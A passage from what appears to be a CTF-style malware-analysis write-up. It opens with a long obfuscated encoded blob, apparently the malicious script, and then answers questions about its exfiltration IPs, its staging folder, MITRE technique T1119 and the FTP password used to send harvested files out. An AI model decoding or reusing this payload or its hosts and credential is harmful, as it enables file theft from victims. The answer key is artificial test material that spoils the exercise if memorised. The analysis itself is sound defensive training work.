NiM0JTWWc0V1MrQUhQSzBnUHc5Q1B1UVhZb1JISWxkbWJoaDJZZzhHZGdVV2JwUkhJemRDZHBCQ1psUldhalZHWmdVbWRua0VJMFZuWWd3U2VzVkdkaHhHSWwxR0l1VldaaUJ5Y25RWFlvUkZJL0FYWjBOSEkwaFhadUJTWm9SSElsdFdZMEJ5YjBCQ1psUlhZMGwyY2xoR0kwVm5ZZ3dpY2haV1lnMDJieVpHSWw1MmJsMTJiekJ5WnVsbWNwMUdaaEJpYmxWbVlnVW1kblUzYjVCaWJsaDJkZ2NtYnB4V1psWkdJMEZHYTBCeWR2NTJhZ1UzYlpCaUwxOVdlZ2dHZHBkSElsSlhZb05ISXZSSEluNVdhMDVXWTNCaWJsVm1ZZ1VtZG5rRUluNVdhb1JYWnQ5MmNnTTNKbEpYWm9SSElsTlhkaE5XWmlCQ2QxOUdJbjVXYW9OV1lsSkhJdGRTU2c0eWNwaEdkZ1VXWnpCU2R2bEhJdVZHYTNCQ2RoVm1jbkJ5WnVsMmJrQlNaeWRTZHZsSElsQjNiSUJpUHd4REkrQTNMOEFDTDVWR1MrQUhQSzBnUDVSMmJpeGpDTjREWmhWR2F2d2pDTjRUWnNsSGR6OUNQSzBRZmdBQ0lnb1FEN1lXYXlWMmN0TW5iaE5ISXNrbWNpbEdiaE5FSTZrSGJwMVdZbTFDZHU5bVpnQUNJZ29RRDdCU2VrOW1ZZ0FDSWdvUUQrVUdiNVIzYzhvUUQrUVdZbGhHUEswZ1BzMUdkb3hqQ040RGJ0UkhhZ1VFVVpSMVFQUlVJOG9RRGlBRUk5QVNlazltUXMxR2RvUmlDTm9RRGwxV1lPeEdiMVpFSTVSbmNsQjNieUJGWnVGR2M0VlVMZ0VESTBObmNwWlVMZ1EzWWxwbVlQMUNkalZHYmxORkk4QlNaekpYZGpWbVV0QWlJRmhWUnVzMFRQeEVWVjlrSWdJWFoweFdhRzFDSWlVMllwWm1aUEJDZG05MmN2SjNZcDFFWHpWR2JwWkVJdEZtY245bWNReGxPREpDSW9SWFlRMUNJdFZHZEpSR2JwaDJRdFFYWkhCU1BnQUNhMEZHVXI5MmJzUlhkdlJpQ05vUURLMHdkdlJtYnBkMWRsNTBiTzFDSTBsV1lYMUNJaUlDWW9SWFlRTkhKaUFXUDBCWGF5TjJjdklDSTBOWGFNUm5ibDFXZG5KWFF0QUNhMEZHVWxoWFIzUkNJb1JYWVFWR2JwWlVMZ00zY2xOMmJ5QlZMMEpYWTBObENOVTJZeTltUnRBQ2EwRkdVelJDSW9SWFlRVkdicFpVTGdVR2JwWlVMMFYzVGd3SElBSmlDTlFYYTRWbUNOVTJjdngyWUswZ0lnaEdkaEJWWjJsR2FqSlhZa0lDWWdRWGR3cFFEcTBUZWx0R2R6OUdhdEF5TDRNVE11WWpOdWtqTng0U056QTBJdEVEVEgxMmFMWlRhaE1rSjQwa09sTldhMkpYWno5eUw2QUhkbU5ISXVWR2N2cFFEaUFrQ05JQ2Q0Um5MMEJYYXlOMlVsTm1iaDVXWjA1V2FoMUdYb1JYWVFSM1loSkhkNFYwZGtJQ0k5QUNhMEZHVXpSaUNOSVNidk5tTFFOMFV1bDJWY2hHZGhCRmRqRm1jMGhYUjNSaUlnMERJb1JYWVFWR2VGZEhKSzBnQ05VMll5OW1SdEFDYTBGR1UwTldZeVJIZUZkSEpnZ0dkaEJsYnZsR2RoNVdhME5YWkUxQ0lseFdhR0JYYWFkSEpnZ0dkaEJWTGdVbWRwaDJZeUZVTGs1V1l3aFhSSzB3WnVsMmN5RkdVamwyY2hKVVp6VlZMZ1VHYnBaRWNwcDFka0FTWnNsbVIwVjNUdEFDYnlWRmNwcDFka0FTYXlWVkxnSUNkbGQyVmlBQ2R1VjJaQkpYWnpWVkxnUTNjbFZYY2xKbFlsZFZMbHQyYjI1V1NLMGdDTkl5Y3M5MmJVMXlhelZHUnd4V1pJeDFZcHhtWTFCRlh6SlhaelZGWDZNa0lnMERJb1JYWVFSM1loSkhkNFYwZGtvUURpQVhhNjVDVURObGJwZEZYeWxHUjBWMlp5Rkdka0lDSTlBU1pzbG1Sd2xtVzNSaUNOSUNjcHBuTHQ5Mll0SVhZa0ZtYzBaMmJ6OVZac0pXWTBKM2J3MUNjak5uYnBkM0x3OGljME5YYWs5U1pzSldZMEozYncxQ2NqTm5icGQzTHpSM1kxUjJieUIzTGpsR2RoUjNjdjAyYmo1aWNoUldZeVJuWnZObkx6VjNMdm96Y3dSSGRvSkNJOUFDYnlWRmNwcDFka29RREswQUlsTm1jdlpVTGdnR2RoQlZaMmxHYWpKWFlrQUNhMEZHVXU5V2EwRm1icFIzY2xSVUxnSVhhRVJYWm5KWFkwUkNJb1JYWVExQ0lsWlhhb05tY0IxeWN6Vm1jdzEyYkRwUURpQVhhNjVTWnRGbWIwTjNib1JDWHlsR1IwVjJaeUZHZGtJQ0k5QUNhMEZHVWxaWGFvTm1jaFJpQ05jU1oxNVdhMDUyYkRsSGIwNVdac2wyVW5BU1BnVTJZdVZtY2xaV1p5QjFjelZtY245bWNRUmlDTlUyWXk5bVJ0QVNLblFIZTA1eWJtNVdhUWQwSmdJWGFFUlhabkpYWTBSQ0lvUlhZUTFpYnA5bVNvQUNhMEZHVWx4V2FHMUNJbHhXYUcxQ2QxOUVJOEJpY3ZBQ2RzVjNjbEpIY25wUURsTm1jdlpVTGdreUowaEhkdThtWnVsV1p5RkdhVGRDSXlsR1IwVjJaeUZHZGtBQ2EwRkdVdDRXYXZwRUtnZ0dkaEJWWnNsbVJ0QVNac2xtUnRRWGRQQkNmZ1VtY2hoMlVpMTJVdFFYWkhwUURLMFFmZ0FDSWdvUUQ5QkNJZ0FDSWdBQ0lLMFFaakozYkcxQ0lvUlhZUTUyYnBSWFl1bEdkelZHWmtBaWJ2bEdkaDVXYTBOWFpFMUNJbDFXWU94R2IxWmtMZlJDSW9SWFlRMUNJdFZHZEoxU2V3OTJRZ0FDSWdBQ0lnQUNJZ0FDSUswd2Vna0NhMEZHVXU5V2EwRm1icFIzY2xSR0pnVW1idEFTWnRGbVRzeFdkRzV5WGtnQ0ltbEdJZ0FDSWdBQ0lnb1FEZ0FDSWdBQ0lnQWlDTlVXYmg1a0xmUkNJeWxHUjBWMlp5Rkdka0FDYTBGR1V0NFdhdnBFSTlBQ2EwRkdVdTlXYTBGbWJwUjNjbFJHSmdBQ0lnQUNJZ0FpQ05zSEkwTldacUoyVHRnMlloVmtjdlpFSWdBQ0lLMEFmZ2NTWjE1V2EwNTJiRGxIYjA1V1pzbDJVbkFpYnZsR2RqRmtjdkpuY0YxQ0lsTm1jdlpVTGdRM2NweEVkNFZHSmdVR1oxeDJZdWxVTGdVMmN5VjNZbEpWTGdJWGFFaDJZeUZXWnpSQ0l0VkdkSlJHYnBoMlF0UVhaSEJTUGd3R2IxNUdKSzBBSWdBQ0lnQUNJZ0FDSWdBQ0lLMGdJME4zYnVvaUlnd2lJblIyYnVvaUlnd2lJd1IyYnVvaUlnd2lJelIyYnVvaUlnd2lJMFIyYnVvaUlnQUNMaVEzY3c1aUtpQUNMaXdXYmw1aUtpQUNMaWMyY3Q1aUtpQUNMaWdIZHZSbUxxSUNJc0lDZTB4R2V1b2lJZ0FDSWdBQ0lnQUNJZ0FDSUswQUlzSUNlMDlHY3VvaUlnd2lJMFoyYnE0aUlnd2lJMk4zWXVvaUlnd2lJbVJHY3VvaUlnd2lJNFJIY3c1aUtpQUNMaVFIY3c1aUtpQUNMaWczY3NobkxxSUNJc0l5Y3NobkxxSUNJc0lDZWo5R1p1b2lJZ3dpSWo5R1p1b2lJZ0FTUGdRM2NweEVkNFZHSkswZ0NOMG5DTlVXZHVsR2R1OTJRNXhHZHVWR2JwTkZJdTlXYTBOV1F5OW1jeVZVTGdVMll5OW1SdEF5YXY5R2IwVjNUZ1VXYmg1VUxnTTNjbE4yYnlCVkx3OUdkVEJDSWdBaUNOc0hJcFVXZHVsR2R1OTJRNXhHZHVWR2JwTkZJdTlXYTBOV1F5OW1jeVZVTGdzMmJ2eEdkMTlFSWwxV1lPMUNJek5YWmo5bWNRMUNkbGRFS2dZV2FLMGdDTlUyWXk5bVJ0QVNLblFIZTA1eWNsTjNjbE4yYnlCbGNsTlhWbkFpY3BSRWRsZG1jaFJISmdnR2RoQlZMdWwyYktoQ0lvUlhZUVZHYnBaVUxnVUdicFpVTDBWM1Rnd0hJa2wwY3pWMll2SkhVZ3dTWnRGbVR6TlhaajltY1FCQ2RqVm1haTlVTDBOV1pzVjJVZ3dISXpWMmN6VjJZdkpIVXlWMmNWUm5ibEpuYzFOR0pLMGdDTjBuQ04wSElnQUNJSzBBSWdVMmNzRm1aa0FDSWdBQ0lnQUNJSzB3ZWdnMlkwRjJZZzBISWdBQ0lLMGdjbE5YVjA1V1p5SlhkalJDSXhWV0xnSVhaelZsTHBnaWNsNTJkUFJYWkg1eVhrQUNJZ0FDSWdBQ0lLMHdlZ2tuYzBCQ0lnQWlDTnNISTBOV1pxSjJUdFVtY2xoMlZnd0hJek5YWmo5bWNROWxNejRXYVhCQ2RqVm1haTlVYXRkVkwwVjJSZzBESXpWMmN6VjJZdkpIVXlWMmNWUm5ibEpuYzFOR0pLMGdDTlUyWXk5bVJ0QVNLblFIZTA1eWJtNVdhV0YwSmdJWGFFUlhabkpYWTBSQ0lvUlhZUTFpYnA5bVNvQUNhMEZHVWx4V2FHMUNJbHhXYUcxQ2QxOUVJOEJDYnNWbmJrNGpNZ1VXZHNGbWR2QUNWRmRFSTBOV2RrOW1jUU5YZHlsbVZwUm5iQkJDU1VGRVVnSWpjbFJuYmxOVWUwbG1jMU5XWlR4RmR2OW1jY3hsT0ZOVVFRTlZSTkZrVHZBeVlwMTJkSzBRWmpKM2JHMUNJcGNDZDRSbkx6SlhaelZIYmhOMmJzZENJeWxHUjBWMlp5Rkdka0FDYTBGR1V0NFdhdnBFS2dnR2RoQlZac2xtUnRBU1pzbG1SdFFYZFBCQ2ZnUW5iMTkyWWpGa2NsTlhWZkp6TXVsMlZnTTNjaHgyUXRBQ2RqVm1haTlVYXRkVkwwVjJSSzBRWmpKM2JHMUNJcGNDZDRSbkx2Wm1icE5FUm5BaWNwUkVkbGRtY2hSSEpnZ0dkaEJWTHVsMmJLaENJb1JYWVFWR2JwWlVMZ1VHYnBaVUwwVjNUZ3dISXN4V2R1UmlQeUFpVEpGVVRQUmtVRk5WVjZZbmJsUmlPalJHZGxkMmNrOUNJME5YWjB4bWJLMGdDTlUyWXk5bVJ0QVNLblFIZTA1U1p0Rm1ieVYyYzFkQ0l5bEdSMFYyWnlGR2RrQUNhMEZHVXQ0V2F2cEVLZ2dHZGhCVlpzbG1SdEFTWnNsbVJ0UVhkUEJDZmdJWFp6VkZkdVZtY3lWM1lrb1FESzBRZkswQWJzVm5UdFFYZFBCQ2ZnVTJZeTltUnRBaWNwUkVkbGRtY2hSSEpnZ0dkaEJWTGdrbmN2UjNZbEpYYUVCU1p3bEhWdFZHZEoxQ0l0VkdkSjF5ZGw1RUlnQUNJSzB3ZWdrU0t5Vm1icEZHZHU5MlFnVUdjNVJGYTBGR1V0QWljcFJFZGxkbWNoUkhKZ2dHZGhCVkxnZ0dkaEJWTDBOWFpVaENJMDltYnRnQ0ltbG1DTm9RRGlNWFpzbG1SZ01XYXNKV2RReDFZcHhtWTFCRlh6SlhaelZGWDZNa0lnMERJeWxHUjBWMlp5Rkdka29RRGlNbmNsTlhWY3B6UWlBU1BnSVhhRWgyWXlGV1p6UmlDTm9RRG4xV2FrQXljelYyWXZKSFV0UW5jaFIzVUswd1p0bEdKZ1VHYnBaRWQxOVVMZ3dtYzFSQ0lwSlhWdEFDZHpWV2R4Vm1VaVYyVnRVMmF2Wm5iSnBRREswZ0ltWldhMDVDWnlGMlF5Vm1ZdFZXVGZKWFkwTm5jbEJYZFR4MWNrRjJiczUyZHZSRVh5VjJjVlJuYmxKbmMxTkdKY05uY2xOWGRjcHpRaUFTUGdjV2JwUmlDTklpWm1sR2R1UW1jaE5rY2xKV2JsMTBYeUZHZHpKWFp3VjNVdkFETXdrak8wUVRNdWNET3g0aU53SWpMMFF6THZvRGMwUkhhaUFTUGd3bWMxUmlDTlVVVEI1a1VGTlZWNlluYmxSQ0k5QWljbE5YVjA1V1p5SlhkalJpQ05VVVRCNWtVRlJWVlExMFREcGpkdVZHSmcwRElsMVdZdVIzY3ZoR0o&oeol=CRLF
Answer: 35.169.66.138,44.206.187.144
Task 9
Question
The binary created a staging directory. Can you specify the location of this directory where the harvested files are stored?
Solution
You can find the directory in the deobfustcated code as shown in the following image.
Answer: C:\Users\Public\Public Files
Task 10
Question
What MITRE ID corresponds to the technique used by the malicious binary to autonomously gather data?
Solution
The malicious binary uses the MITRE Techinque with an ID of T1119
. You can find more details about this technique in the following link.
Answer: T1119
Task 11
Question
What is the password utilized to exfiltrate the collected files through the file transfer program within the binary?
Solution
You can find the password in the deobfustcated code as shown in the following image.
Answer: M8&C!i6KkmGL1-#